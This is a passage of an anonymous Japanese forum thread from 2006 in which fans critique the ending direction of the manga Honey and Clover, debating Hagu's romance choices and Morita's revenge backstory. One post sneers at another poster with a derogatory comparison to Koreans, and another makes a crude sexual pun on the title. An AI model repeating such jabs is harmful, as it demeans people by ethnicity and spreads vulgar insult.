728 :花と名無しさん:2006/07/17(月) 20:24:33 ID:???0
2、ロココ調ミニチュア家具を作らせる


>>727 蒸し返すな

729 :花と名無しさん:2006/07/17(月) 20:25:33 ID:???0
野宮もわかってないのにベラベラ喋らせられちゃって
「森田が好きなんだけど臭が可哀想だから臭を選んであげた」=野宮解釈
違うでしょ
「自分の創作意欲に刺激をくれなくなった森田をやめて
自分の創作のために便利に使える臭を選んだ」
それだけだよね

730 :花と名無しさん:2006/07/17(月) 20:28:18 ID:???0
作者、このスレみてるかなぁ

731 :花と名無しさん:2006/07/17(月) 20:29:03 ID:???O
>>708
選んだら選んだで今までの成長や自立を匂わせる描写が全てあぼん。
一番唐突なのが禁じ手の怪我だと思う

732 :花と名無しさん:2006/07/17(月) 20:32:19 ID:???0
>>731
もう成長や自立は問題じゃなくなってんじゃないか?あきれた話だが。
よくある「芸術家とパトロン」の関係を描きたいのだろうと捉えておくのが自然だが
それにしたって描写不足、説明不足なんだよな。

ベッタベタすぎてアレだよね >怪我

733 :花と名無しさん:2006/07/17(月) 20:34:06 ID:???0
初めから、ハグのケガで終わることになってたら
話の運びがだいぶ違ってたと思う。
後付けかんがなぁ。

734 :花と名無しさん:2006/07/17(月) 20:36:00 ID:???0
竹本が縁日で告白した時にはぐが流した涙は何だったんだろう

735 :花と名無しさん:2006/07/17(月) 20:37:04 ID:???O
>>714
傷付いたアテクシカワイソス厨か。まるで半島の方みたい。
こういう痛々しい儲が安易にマンセーするんだろうな。
痛々しい儲は巣にお帰り下さいね。

736 :花と名無しさん:2006/07/17(月) 20:37:11 ID:???0
>>734
ノリです

737 :花と名無しさん:2006/07/17(月) 20:38:40 ID:???0
>>734
心の汗です

738 :花と名無しさん:2006/07/17(月) 20:40:01 ID:???0
>>734
レタスとか切ったときに茎から出てくるなんか白い液体です

739 :花と名無しさん:2006/07/17(月) 20:43:12 ID:???0
>738
>レタスとか切ったときに茎から出てくるなんか白い液体

たけのこからこれは出ないだろう

740 :花と名無しさん:2006/07/17(月) 20:43:33 ID:???0
修=安心感(昔は竹本のポジションだったが)
森田=刺激
ってだけならいいんだけどそこに森田の金が関わってくると…
少女漫画?的に金を選ぶのはナシだろうからな。
読者的には修を選ぶ方が依存だろって思うけど、
ハチクロ界では森田は金の人扱いだから、くっつかない気がする。


741 :花と名無しさん:2006/07/17(月) 20:44:09 ID:???0
>>739
よく読もう、ぱぐから出てるんだぜ

742 :739:2006/07/17(月) 20:47:46 ID:???0
>>741
何を取り違えたんだか自分でも不思議なくらいだ

・・・逝ってきまつorz

743 :花と名無しさん:2006/07/17(月) 20:48:16 ID:???0
>>734
マジレスしますと、
「あーぁいいお友達だったのに、これじゃあもう気まずくて
今までどうり仲良くは出来ないなー、残念」だと思ってる。
こういうのよくあるよね、だから男女の友情はもろいんだ。

744 :花と名無しさん:2006/07/17(月) 20:50:20 ID:???0
森田は、
作者自身が森田というキャラを扱いきれなくてポシャっちゃった感じですよorz

745 :花と名無しさん:2006/07/17(月) 20:52:21 ID:???0
はぐって超天然で何も考えてないから
顔見知り以上友達未満のだった森田からたっかいミュールとか遠慮なくもらっちゃうし
竹本にベルサイユつくって〜とか言えちゃうんだと思ってたけど
9巻で思想を持ってることがわかって愕然とした。

746 :花と名無しさん:2006/07/17(月) 20:55:15 ID:???0
>>744
ほんとにね。
彼は特にギャグとシリアスが完全に分離していた。

この漫画は色んな漫画のコラージュって言ってた人がいるけど、
ギャグ漫画とシリアス漫画を消化しないまま切り張りしちゃった感じ?

747 :花と名無しさん:2006/07/17(月) 20:55:19 ID:e/M7KtCw0
>>739
森田=金?
森田は同じ人種って扱いでしょ。天才。


748 :花と名無しさん:2006/07/17(月) 20:56:29 ID:???0
 
 一部の専門分野に特化した頭脳を持つ人間は
 他の部分が欠落している場合が多い

こんなとこだけ妙なリアル持ち込まないでください作者・・・

749 :花と名無しさん:2006/07/17(月) 20:56:48 ID:???0
>>744
マサルが好きだったんだっけ

750 :花と名無しさん:2006/07/17(月) 21:02:46 ID:???0
森田が今までぶっとんだギャグキャラだったのは
復讐という闇を背負ってるために他人とあまり深く関わることをためらう彼は
道化を演じることで自分の心に踏み込まれないよう他人と距離をとってきた・・
って理由だったのか?とか思い始めたらもう
8巻までの森田がイタイタしくてみてられんw


751 :花と名無しさん:2006/07/17(月) 21:03:35 ID:???0
マサルさんもそうだし

ガンダム、ドリフ、ジブリ、男塾、楳図かずお、綾波・・・
他になんかあるかねぇ

752 :花と名無しさん:2006/07/17(月) 21:04:00 ID:???0
>>744
マサル似だよね、見た目も。
・・・反論覚悟でいってみました

753 :花と名無しさん:2006/07/17(月) 21:05:00 ID:???0
金はないが未来と夢があるこれからの若造の青春と切なく甘酸っぱい漫画と
信じていたが・・・・とって付けて天才とか芸術家って共感しづらい



754 :花と名無しさん:2006/07/17(月) 21:05:53 ID:???0
>>752
肩の輪を外した後なら似てない事もない
とは言い切れない

755 :花と名無しさん:2006/07/17(月) 21:06:19 ID:???0
>>750
そんな感じだろうね。
森田の父は、森田の「完成型」という印象を受けた。

756 :花と名無しさん:2006/07/17(月) 21:07:11 ID:???0
自分は、旅館で真山に「俺と一緒に会社をつくろう!」って言ってた森田は何を考えてたんだろう。
父親と裏切った父親の友達の話があったのに、あれはちょっとシャレにならないんじゃ…。


757 :花と名無しさん:2006/07/17(月) 21:08:26 ID:???0
>>751
松本大洋、冬野さほあたりにも影響受けてると思った

758 :花と名無しさん:2006/07/17(月) 21:09:38 ID:???0
>>755
兄が邪魔してなけりゃ森田は父みたくなってたんだろうね。
ちょっと情緒不安定で病的な二面性をもつ奴になっちゃったな

759 :花と名無しさん:2006/07/17(月) 21:10:32 ID:???0
ハッ!
パグのモデルはまさか

めそ?

760 :花と名無しさん:2006/07/17(月) 21:11:49 ID:???0
>>756
そういやそうだね。
それにしても日本語でオk

761 :花と名無しさん:2006/07/17(月) 21:13:28 ID:???0
>>753
そこなんだよなー。
作者はちょっと冒険し過ぎたな。
こういうテーマを扱うには、よほど慎重にならないといけないのに。
天才芸術論ラストは難易度高いと思ってたんだが、まさか持ってくるとはねぇ。
だが読者を混乱させてる点においてカナリ失敗してる。

762 :花と名無しさん:2006/07/17(月) 21:17:32 ID:???0
>>750
そんな悲しいことを。。。
あのキャラは遺伝なんじゃないの?
森田父も達夫に頭おかしいって言われてるし。

763 :花と名無しさん:2006/07/17(月) 21:19:22 ID:???0
初めは、基本恋愛で、
そこにスパイスとして
才能の差・自分には見えない世界が2人には見えてる・自分には何があるんだ、とか
竹本の苦悩がからんで・・・って感じだったのにね。
まさかはぐの芸術芸術を前面に押し出してくるとは!


764 :花と名無しさん:2006/07/17(月) 21:20:36 ID:???0
>>762
確かに森田のあのキャラは親父の遺伝だねw
でも、そこに不安定さを秘める要因となってるのが
復讐という心の闇なんだろう。

765 :花と名無しさん:2006/07/17(月) 21:23:50 ID:???0
典型的な天才の性格だよね。そんで兄は典型的な秀才の性格。
森田の親父が出てきたときまたこの手のキャラかと思って食傷気味になった。

766 :花と名無しさん:2006/07/17(月) 21:24:08 ID:???0
>>762
森田父は変な人、森田は変態ってかんじがする。

父はなんで死んだんだよー?

767 :花と名無しさん:2006/07/17(月) 21:24:38 ID:???0
たけのこが返り咲くシナリオ

はぐがリハビリ無理して死亡。

竹「なぜはぐちゃんを芸術に追い込んだんです!彼女は戦う人ではなかった!」
臭「俺がいなければはぐの芸術家への目覚めはなかった!
  現代(いま)という時代(とき)では、はぐは死ぬ運命だったんだ!」
竹「先生だって・・・芸術家だろうに!!!」

768 :花と名無しさん:2006/07/17(月) 21:25:56 ID:???0
>>763
キャラにまつわる様々な要素(恋愛、将来、深層心理、葛藤etc)
を描く際の、それぞれの要素の重きの置き方を、作者が見誤った感じだね。

769 :花と名無しさん:2006/07/17(月) 21:26:05 ID:???0
それよりなんで達夫は後藤隊長にそっくりなの?

770 :花と名無しさん:2006/07/17(月) 21:26:50 ID:???0
あの年齢からずっと復讐計画たててたのかな。
小中高とずっと金稼ぎ?
苦労したんだな森田・・・・・・・・・・・・・

771 :花と名無しさん:2006/07/17(月) 21:28:00 ID:???0
森田と竹の子は設定の置き方がワンパだね
凡人と天才という違いはあってもどっちも父の死と遺言がネックだ

772 :花と名無しさん:2006/07/17(月) 21:28:04 ID:???0
>>767
ロマンチックじゃないから却下

773 :花と名無しさん:2006/07/17(月) 21:28:40 ID:???0
>>767 何かのパロ?

774 :花と名無しさん:2006/07/17(月) 21:29:47 ID:???0
才能でも、金でも、過去の暗さでも森田に負けたたけのこ。

775 :花と名無しさん:2006/07/17(月) 21:31:06 ID:???0
みんな親死にすぎだろ。

776 :花と名無しさん:2006/07/17(月) 21:32:09 ID:???0
作者がそういう設定好きだからしゃーない

777 :花と名無しさん:2006/07/17(月) 21:33:06 ID:???0
なんかあれだね、
両親いて可愛がられて育ったキャラたちだけが
幸せ掴んでくね。
山田や真山や。

778 :花と名無しさん:2006/07/17(月) 21:33:44 ID:???0
森田と竹の子がくっついちゃえばハッピーまるエンド

779 :花と名無しさん:2006/07/17(月) 21:34:42 ID:???0
父親が死んだ心の傷でおとこに走るのか・・・

780 :花と名無しさん:2006/07/17(月) 21:34:50 ID:???0
>>777 
果たして山田はどうなんだろう
万一野宮とゴールインできなかったら
パラサイト...

781 :花と名無しさん:2006/07/17(月) 21:36:08 ID:???0
テレビのマンハッタンラブストーリーってドラマあったけど
あれのラストみたいにトンデモなく想定外のカップルができまくる

782 :花と名無しさん:2006/07/17(月) 21:36:11 ID:???0
>>780
もう仕事入ってきてるからいいんじゃない?
実家に住みつつ陶芸で食ってくんだよ。
今となっては野宮とくっつかないわけはないけど。

783 :花と名無しさん:2006/07/17(月) 21:37:05 ID:???0
>>778 
本気でそんなことになったらネ申漫画認定するけど
コミックスはブクオフ行きだなw

784 :花と名無しさん:2006/07/17(月) 21:37:11 ID:???0
>>781
あれはほんとうに逆走ラブストーリーだったw

785 :花と名無しさん:2006/07/17(月) 21:37:58 ID:???0
達夫の母はどうなったんだろう

786 :花と名無しさん:2006/07/17(月) 21:39:06 ID:???0
森田の父の死因は読者には説明されてないけど、
はぐは森田から説明受けたんだろうね。教えろよ!

787 :花と名無しさん:2006/07/17(月) 21:41:24 ID:???0
>>785
自分も気になる。
年金施設にでも入ったか?
最底辺の暮らししかさせてもらえないようなとこだが

788 :花と名無しさん:2006/07/17(月) 21:41:41 ID:???0
森田技研の松田さんたちが忠臣蔵気分で頑張ってたと思うと
復讐というかなんというか
馨頑張ってよかったじゃん
めそめそすんなよ

789 :花と名無しさん:2006/07/17(月) 21:41:43 ID:e/M7KtCw0
全員片思いって設定はどこまで?
早々に森はぐ両思いだと思うんだけど。

790 :花と名無しさん:2006/07/17(月) 21:42:26 ID:???0
森田って、ケチキャラなのか?
そのわりにはちゃぶだいとか凧とかぽこっとお金使うよね。
よく分からん。

791 :花と名無しさん:2006/07/17(月) 21:45:16 ID:???0
全員片思いだけは納得いかんかった。
はぐだけは違っていたとゆう気がした

792 :花と名無しさん:2006/07/17(月) 21:45:18 ID:???0
高揚感はプライスレスだもの

793 :花と名無しさん:2006/07/17(月) 21:46:19 ID:e/M7KtCw0
>>789
一応会社を取り返すために稼いでたわけでしょ。

794 :花と名無しさん:2006/07/17(月) 21:47:43 ID:???0
森田技研の人達はなんであんなに忍と馨をおぼっちゃま扱い?
もともと社長だって友達みたいなノリだったじゃん。
その子供に「様」って・・・
王子様がかきたかったのかウミノは。

795 :花と名無しさん:2006/07/17(月) 21:48:48 ID:???0
多分根っからお金稼ぐの好き(父親譲り)
でも復讐や、それに縛られる馨に加担することに対しては虚無感持ちつつ・・
みたいな

796 :花と名無しさん:2006/07/17(月) 21:49:00 ID:???0
>>786
気になるよね、父の死因。
でもそこまで描かないとこがいいんだろうな。
しかも母も早死にっぽい?


797 :花と名無しさん:2006/07/17(月) 21:49:59 ID:???0
>>791
同意。

死者←リカ←真山←あゆ はうまいこといってんだけどねぇ。>片思い

798 :花と名無しさん:2006/07/17(月) 21:50:58 ID:???O
森田の設定はあそこまで引っ張らなくても良かったんじゃないか?
キャラクターがチグハグに見えるよ

799 :花と名無しさん:2006/07/17(月) 21:51:02 ID:???0
森田技研の皆さんがあんなにがんばるからには、
のっとられたのと関係あったんだろうね、死因が。

800 :花と名無しさん:2006/07/17(月) 21:51:35 ID:???0
ああそうか、王座を追われた王子様か

うわ森田、王子様要素てんこもりだったんだね。あらためて。

801 :花と名無しさん:2006/07/17(月) 21:53:30 ID:???0
病室の窓からはいってくるのはラプツェルイメージか。

802 :花と名無しさん:2006/07/17(月) 21:53:32 ID:???0
森田カオルがキャスバルで、忍はアルテイシアです

803 :花と名無しさん:2006/07/17(月) 21:54:51 ID:???0
はぐがモテすぎんだよ!!

804 :花と名無しさん:2006/07/17(月) 21:55:00 ID:???0
>>796
「晩御飯カレー(カブたん初披露)」の時点で、もういなくなってる感じだよね >森田母

805 :花と名無しさん:2006/07/17(月) 21:56:16 ID:???0
ミュールはガラスの靴で
窓から忍び込んでくるのはラプンツェルをイメージ?
こじつけてみました。

806 :花と名無しさん:2006/07/17(月) 21:56:33 ID:???0
あんなに小さいカオルたんがカレー作ってたのか。・゚・(ノД`)・゚・。

807 :花と名無しさん:2006/07/17(月) 21:57:52 ID:???0
王子様かー。
だったら悪い魔法使いと戦ってくれないとなー。
臭が悪人変化することはないだろうけどなー。

808 :花と名無しさん:2006/07/17(月) 21:58:41 ID:???0
いやいやそこは生きてたと思うよ、母。>カブたん

でもなんでか2人の思い出の中には出てこないね。
父のインパクトに負けたのか。可愛いお母さんだったけどね。

809 :花と名無しさん:2006/07/17(月) 22:00:01 ID:???0
上の方でテレビドラマの話題が出てるのを見て、ハチクロってシリーズ数重ねすぎて
最終シリーズの頃には破綻してグダグダになってしまう海外ドラマみたいだと思った。
容姿が当初と変貌してしまうところとか。

810 :花と名無しさん:2006/07/17(月) 22:00:57 ID:???0
>>808
ウミノさんのことだから、
生きてる家族がいるんなら無理にでも画面に詰め込んできそうな気はするけどね

811 :花と名無しさん:2006/07/17(月) 22:02:35 ID:???0
>>809
>容姿が当初と変貌してしまうところとか

ちょwそこは・・・w

812 :花と名無しさん:2006/07/17(月) 22:03:47 ID:???0
海外ドラマって「渡る世間」みたいに関係性が全然変わらないのかと思ってた。

ハチクロの破綻は、逆に人間性を成長させたり関係性を変えたりしようとしてるからでは?
そのことを「移りゆく青春のはかなさなんだよ」と言おうとしてるが
うまくいってない、的な・・・

813 :花と名無しさん:2006/07/17(月) 22:04:03 ID:???0
雑誌の掲載スピードと漫画のなかで時間が経つスピードあわせてたんだよね?
最近は無視してない?

814 :花と名無しさん:2006/07/17(月) 22:05:38 ID:???0
森田のアジトとか、まさかの2話連続だったしね。


815 :花と名無しさん:2006/07/17(月) 22:08:25 ID:???0
ほのぼの日常を描くストーリーだったからこそ、現実の時間の流れにあわせられたんだよ。
話が急展開しはじめたからもう無理だ。

816 :花と名無しさん:2006/07/17(月) 22:09:06 ID:???0
森田がひらりと越えた窓枠にいちいちひっかかる竹本。
ゴメンそういうとこだけ好きで。

817 :花と名無しさん:2006/07/17(月) 22:10:03 ID:???0
今漫画の中で季節は冬のはじめくらいですか

818 :花と名無しさん:2006/07/17(月) 22:11:03 ID:???0
森田兄弟はアマデウスのモーツァルトとサリエリのようだと思った。

819 :花と名無しさん:2006/07/17(月) 22:11:24 ID:???0
王子さまはおじさまに負けちゃうのかしらねー

820 :花と名無しさん:2006/07/17(月) 22:12:07 ID:???0
>>812

教養小説性を持つ漫画作品を目指すこと自体に問題はないけど
単に作者が力量不足でした って感じだ。

821 :花と名無しさん:2006/07/17(月) 22:14:31 ID:???O
コミック派ですが、
なんだか急にはぐが大人びていて違和感。
芸術家としての自覚の芽生え
(もうじき学生じゃなくなるから)
を一人称の変化で表したのだろうか。
安易すぎやしないか。
それと修には修の人生がある、なんてはぐが考える様になるにはそれなりのきっかけが必要だと思う。
はぐみは内省する様な質ではないと思う。

はぐみの中で森田はどんな存在なのだろう。
キスしたことは遠い記憶なのだろうか。

それにしても「様」をつけたがるウミノさんのセンスに脱帽☆

822 :花と名無しさん:2006/07/17(月) 22:14:40 ID:???0
>>818
それでいくと森田死ぬね・・・(間接的に)兄の手によって・・・

823 :花と名無しさん:2006/07/17(月) 22:14:45 ID:???0
>>817
だいぶ遅れたね

824 :花と名無しさん:2006/07/17(月) 22:16:53 ID:???0
たけのこはモノローグで過去を振り返ってるから死なないし、
やっぱ死ぬのは森田かもね。

825 :花と名無しさん:2006/07/17(月) 22:18:18 ID:???0
>>813
そこが好きだったのにな、都内の話なのに季節感がある感じ。
決めたことはちゃんと最後までやり通して欲しかった。

826 :花と名無しさん:2006/07/17(月) 22:18:42 ID:???0
森田父と司はモーチャルトとサリエリだけれど
カオルとシノブはもっとなんというか甘い関係にも思えるな
ゴキブリとってくれたし・・・。

827 :花と名無しさん:2006/07/17(月) 22:19:44 ID:???0
なんであの人たち写真のこってないのかね。
誰もカメラ持ってないのか

828 :花と名無しさん:2006/07/17(月) 22:20:02 ID:???O
今までずっとはぐをマスコットキャラとして扱い過ぎていきなり独白とか寒いぞ

829 :花と名無しさん:2006/07/17(月) 22:20:21 ID:oYmh02UT0
>>803
んなわけねえだろ!誰がカレー作るんだよ。
夜逃げシーンで車の荷台に兄弟だから助手席はお母さんでしょ。

830 :花と名無しさん:2006/07/17(月) 22:20:49 ID:???0
竹本に一人称「私」で喋った後(修の人生貰っちゃ悪いとか言う話)
海行こうって盛り上がったときに「はわわーはぐ貝拾いたい」って言ってるんだ。
こいつ・・・天然じゃなかったのか。

831 :花と名無しさん:2006/07/17(月) 22:22:14 ID:???0
みんなで過ごすクリスマスはこれが最後とか
みんなで海に結局行かなくて想像の中の風景が最後とか
当初からやたら青春はもうすぐ終わる…的なせつなさを演出しまくってた漫画だったけど。

832 :花と名無しさん:2006/07/17(月) 22:22:36 ID:???O
むしろカインとアベル>森田兄弟

833 :花と名無しさん:2006/07/17(月) 22:22:39 ID:???0
とりあえず森田兄弟は意外と仲がよくってなんかほっとした。

834 :花と名無しさん:2006/07/17(月) 22:23:21 ID:???O
はぐをあまりに年齢と精神がかけ離れたキャラにしてしまい、
恋愛描写が不自然になってしまったまさに自爆うみのタン。

835 :花と名無しさん:2006/07/17(月) 22:23:36 ID:???0
>>829
オマイかしこいな!そうか、助手席か。
でもあれだ、アンカ間違ってるよな。

836 :花と名無しさん:2006/07/17(月) 22:23:51 ID:???0
ほのぼの文化部もので十分なんだよね読者は
それこそマサルさんとかあ〜るみたいな

837 :花と名無しさん:2006/07/17(月) 22:25:39 ID:???0
>>827
一話でマヤマが使ってマツ
ポラロイド。

838 :花と名無しさん:2006/07/17(月) 22:26:02 ID:???O
>>830
周りを油断させる為にはぐ呼びだったけど、これからは修とくっつくから一人称を私に戻すわ!

BY はぐみ

839 :花と名無しさん:2006/07/17(月) 22:26:09 ID:???0
修ははぐが描けるようになったら森田のとこに行かせるんじゃないかな。
森田がはぐのことを見守ってたことや何か事情があったことも気づいてるし。
あの『人生ください』のときはぐが自分を選んでくれたことで満足しそう。
でも修が離れても結局はぐは森田のところへは行かず1人で頑張る
頑張ってればいつかきっと会えるよね?……エンドと予想。

840 :花と名無しさん:2006/07/17(月) 22:27:16 ID:???0
>>839
あんたいいひとだね

841 :花と名無しさん:2006/07/17(月) 22:27:54 ID:???0
はぐの芸術家としての苦悩は
竹本が「やっぱり僕とは世界がちがう・・」って悩む材料として
竹本とか山田とかの他人の視点から軽くかかれるべきだった。
急にいっぱいしゃべられても困る!

842 :花と名無しさん:2006/07/17(月) 22:27:57 ID:???0
映画の修ちゃんも釘バット装備するの?

843 :花と名無しさん:2006/07/17(月) 22:28:10 ID:???0
保護者が男になったのもイヤだったが、はぐがロリすぎてキモいのがあったのか
歳相応だったら修ハグも違和感なかったかもと・・・

844 :花と名無しさん:2006/07/17(月) 22:28:45 ID:???O
>>830
映画に影響されて変わったんだよ

845 :花と名無しさん:2006/07/17(月) 22:28:46 ID:???0
>>839
それがいいなー

846 :花と名無しさん:2006/07/17(月) 22:29:06 ID:???0
修にはぐへの恋愛感情持たせた時点で
何やっても修復不可能
目先を逸らせることくらいはできるがな

847 :花と名無しさん:2006/07/17(月) 22:29:39 ID:???0
はぐが歳相応だったら、もとの親子っぽい関係がきもちわるくなるよ。
だってはぐを山田に置き換えてみ?

848 :花と名無しさん:2006/07/17(月) 22:30:24 ID:???O
最後のシ者

849 :花と名無しさん:2006/07/17(月) 22:31:06 ID:???0
森田とはぐが本当に恋愛だったのかよく分からない。特にはぐ→森田。
同属だという安心感とか才能に対する想いの方が強かったというのなら納得できるけど。
実際はぐの方は森田の作品を見るまで森田にビビりっぱなしだったし最終的には芸術の道を選んだし。
それにしても悲しいな竹本。
1番行き場所の無いキャラになりつつないか?

850 :花と名無しさん:2006/07/17(月) 22:31:15 ID:Y1eG2qR90
おれの彼女って、はぐと2センチしか変わらないのか・・・orz

851 :花と名無しさん:2006/07/17(月) 22:31:39 ID:???O
つうか周りが違和感持たずに修を応援ってのが
801漫画で男同士のカップルに周りが違和感持たないしむしろ当たり前だったり応援してるのと同じに見えて辛い…

852 :花と名無しさん:2006/07/17(月) 22:33:49 ID:???0
修が原田のこと引きずって学園の地縛霊みたいになってたことからの卒業。
はぐが修を学園から連れ出してくれるということに意味がある。
みんなが学園=モラトリアムからの卒業をする
それが終わりの始まり。
心地いいことばっかりじゃなかんべよ。

853 :花と名無しさん:2006/07/17(月) 22:34:06 ID:???O
はぐ自体が恋愛とか理解できるキャラクターだったのか疑問だったから、
勝手にはぐは芸術一筋で恋愛はしないだろうと考えてた……

854 :花と名無しさん:2006/07/17(月) 22:34:30 ID:???0
森田の父は死んだの?そういう描写あったっけ?

母は兄弟が幼い頃に亡くなったのかな?

855 :花と名無しさん:2006/07/17(月) 22:34:36 ID:???0
竹本が、
自分は金が無い…
バイトだけでやってけるのか?
でもバイトしすぎるとはぐのケアしてるヒマなんてうんぬん
って悩んでたけど、
これって修にはぐの面倒をみさせたまま、自分がぞばにいてあげてケアの手伝い
っていう考えだよね。
この道は修がはぐに恋愛感情を持った時点で不可能な選択肢になったから、
たけのこはもう手も足も出しようが無いよね・・・
頼んだぞ森田、修はぐだけは阻止してください。

856 :花と名無しさん:2006/07/17(月) 22:34:49 ID:???0
⊂二二二( ^ω^)二⊃ブーン ⊂二二二( ^ω^)二⊃ブーン ⊂二二二( ^ω^)二⊃ブーン
⊂二二二( ^ω^)二⊃ブーン ⊂二二二( ^ω^)二⊃ブーン ⊂二二二( ^ω^)二⊃ブーン
⊂二二二( ^ω^)二⊃ブーン ⊂二二二( ^ω^)二⊃ブーン ⊂二二二( ^ω^)二⊃ブーン
⊂二二二( ^ω^)二⊃ブーン ⊂二二二( ^ω^)二⊃ブーン ⊂二二二( ^ω^)二⊃ブーン
⊂二二二( ^ω^)二⊃ブーン ⊂二二二( ^ω^)二⊃ブーン ⊂二二二( ^ω^)二⊃ブーン
⊂二二二( ^ω^)二⊃ブーン ⊂二二二( ^ω^)二⊃ブーン ⊂二二二( ^ω^)二⊃ブーン
⊂二二二( ^ω^)二⊃ブーン ⊂二二二( ^ω^)二⊃ブーン ⊂二二二( ^ω^)二⊃ブーン

857 :花と名無しさん:2006/07/17(月) 22:35:34 ID:???0
>>854
馨が「おやじだって最期まで」って言ってた。
最期、ってことは確実に天国ですな

858 :花と名無しさん:2006/07/17(月) 22:36:26 ID:???0
>>849
オクテな子には初恋は怖いものです

859 :花と名無しさん:2006/07/17(月) 22:37:58 ID:???0
今月号が妙に後付け臭いのが更に嫌
山田の修との話のぶぶんとか野宮との話しの部分とか

>>852
なんかそれ、お外へ出るのに保護者と一緒じゃなきゃ出れないの
って感じにしか・・・

860 :花と名無しさん:2006/07/17(月) 22:38:11 ID:???0
りっちゃん

861 :花と名無しさん:2006/07/17(月) 22:39:39 ID:???0
森田とはぐの初めてのまともな会話が、ケガ&会社のっとり直後ってのがな。
なんだ急におまえら!?いつのまに会話可能に???って感じだ。
喋らせるなら、徐々に近づいてく様子をもうちっと描いといてほしかった。

862 :花と名無しさん:2006/07/17(月) 22:40:13 ID:???0
>>859
お外へ出るきっかけが大事だったということでしょ
外に出ちゃったら、もうどうでもいいのかも?

863 :花と名無しさん:2006/07/17(月) 22:40:17 ID:???O
数年前のスレはこんなじゃなかった……

864 :花と名無しさん:2006/07/17(月) 22:40:59 ID:???0
タバコ屋のりっちゃん

865 :花と名無しさん:2006/07/17(月) 22:41:09 ID:???0
>>839
うわ、それイイね。
明るい未来が待ってる的な描写でー>森田とはぐみ

でも、今の展開を考えると…好きさ大好きさ!って赤らめて叫んだり、
山田に聞かれてこれまた赤くなりつつ困惑しながら話す修ちゃんを見てると
とてもそんな展開にはならないと…orz

866 :花と名無しさん:2006/07/17(月) 22:42:28 ID:???0
びょーいんから摩天楼のアジトへお姫様をかっさらうかー
萌えしちゅえーしょんだのにどーしてこう振られ気分でロケンローかのう

867 :花と名無しさん:2006/07/17(月) 22:42:31 ID:???0
堺とウミノがリアルでも結婚しますよ

868 :花と名無しさん:2006/07/17(月) 22:43:08 ID:???0
すごいねー

869 :花と名無しさん:2006/07/17(月) 22:43:18 ID:oYmh02UT0
>>849
はぁ?道具買いにデートしたとき味わったことないドキドキで
臭にそれは好きだからとか言われてたじゃん。
もう木彫りのブローチの頃から両思いだよ。

870 :花と名無しさん:2006/07/17(月) 22:43:24 ID:???0
顔赤くしてても
「好きさ!大好きさ!」じゃなくて「ああ、好きだよ・・・」くらいなら
839みたいな展開に持ってけそうなのにね。
完全に理性を失ってる修・・・

871 :花と名無しさん:2006/07/17(月) 22:44:30 ID:???0
森田→はぐみへの気持ちというのも
恋愛というより単にネコとのスキンシップを求めてるような
原始的な感情に見えるよ。

872 :花と名無しさん:2006/07/17(月) 22:45:11 ID:Y1eG2qR90
森田=ベジータ

873 :花と名無しさん:2006/07/17(月) 22:46:46 ID:???0
そのこころは

かませ犬

874 :花と名無しさん:2006/07/17(月) 22:47:25 ID:???0
先生がヤムチャなの?

875 :花と名無しさん:2006/07/17(月) 22:48:42 ID:???0
>>871
自分はそれが森田なりの森田らしい愛情表現かなと思った。

でも傍から見ればそういう風にも見えるかもね。

876 :花と名無しさん:2006/07/17(月) 22:48:46 ID:???0
>>871
そうか?
実際2人のコミュニケーションは野性的だけど
出稼ぎに行く前にはぐの顔がよぎったりしてたとこは
人間の恋ぽいと思うよ

877 :花と名無しさん:2006/07/17(月) 22:49:57 ID:???0
ブルマをモノにしたのは・・・・って話なのかい

878 :花と名無しさん:2006/07/17(月) 22:50:27 ID:???O
看板作ってるところに入ってきて顔赤らめてたしな

879 :花と名無しさん:2006/07/17(月) 22:50:58 ID:???0
それだったらわざわざベジータに例える必要ないから
>>873に一票。

880 :花と名無しさん:2006/07/17(月) 22:52:50 ID:???0
復讐に手を染めてることと
可愛い慈しむべき小さいものと

881 :花と名無しさん:2006/07/17(月) 22:54:06 ID:???O
今日中に次スレの予感

882 :花と名無しさん:2006/07/17(月) 22:54:21 ID:???0
ベジータってそんなキャラだったんか。
背がちっちゃくて生え際後退してたのしか覚えてねーや

883 :花と名無しさん:2006/07/17(月) 22:56:05 ID:???0
森田がはぐに会うために
仕事ほっぽりだして帰ってきたトコは
正直失望した・・・
仕事はちゃんとやるんだな、責任感だけはあるんだなと思ってたのによ。

884 :花と名無しさん:2006/07/17(月) 22:56:15 ID:???0
途中送信してしまった

復讐に手を染めてることと
可愛い慈しむべき小さいものと
その対比で空しさを感じている描写であって、人間的な恋かどうかはギモン
>はぐを思い出すシーン

例えば戦争に赴く兵士が無邪気な子供を見てしんみりするようなシーンと
同じように思ってた

885 :花と名無しさん:2006/07/17(月) 22:57:24 ID:oYmh02UT0
>>871
高いミュール買ったり、オーダーメイドのブローチ
画材デート、マフラーキッス。
どう考えても好き好きはぐちゃんです!

886 :花と名無しさん:2006/07/17(月) 22:57:56 ID:???0
ラスト・ブシドーはどうなったんだろう

887 :花と名無しさん:2006/07/17(月) 22:58:58 ID:???0
>>885
でも愛犬にもそういうことする人いるでしょ?

888 :花と名無しさん:2006/07/17(月) 22:59:13 ID:???0
はぐはなんであんまり小鳥のブローチしなくなったの?
あれが恋愛に無自覚ってのを象徴してるのかと思ってた。

889 :花と名無しさん:2006/07/17(月) 23:00:24 ID:???0
>>885
まあ、漫画の中では恋としてかかれてるからウミノ的にはこれが恋

890 :花と名無しさん:2006/07/17(月) 23:00:33 ID:???O
臭こそわからん

リカと原田のとき、自分が叶えられなかったからはぐを使って叶えてる
ソレに対し、憤りを感じているって思ってた

いきなりはぐちゃんのこと女性として大好きだお!って言われてもね…

891 :花と名無しさん:2006/07/17(月) 23:00:37 ID:???0
秋田から

892 :花と名無しさん:2006/07/17(月) 23:01:03 ID:???0
はじめちょっと恋愛に浮かれたけど
本当の恋愛は怖い、修ちゃんと一緒のほうがいい〜と思ったから。

893 :花と名無しさん:2006/07/17(月) 23:02:24 ID:???0
ハチミツ→精子
クローバー→おまんこ


894 :花と名無しさん:2006/07/17(月) 23:02:36 ID:???0
ってことは自分は森田すきだわ!って自覚があったってこと?

895 :花と名無しさん:2006/07/17(月) 23:02:42 ID:???0
41話(7巻収録)で、
久々に仕事から帰ってきた森田の、はぐに対するリアクション見たら
「恋じゃない」なんていえないと思うんだがなぁ
個人の受け止め方の自由か

896 :花と名無しさん:2006/07/17(月) 23:03:25 ID:???0
はぐは結局のところ恋愛<<<芸術
だっただけじゃないかと思う。

897 :花と名無しさん:2006/07/17(月) 23:03:32 ID:???O
>888
多分今まで自分が異性に対し、感じたことのない何かを彼が与えるから、混乱してしなくなったんだと思う

彼がくれた物だから、それをつけるだけで混乱するみたいな

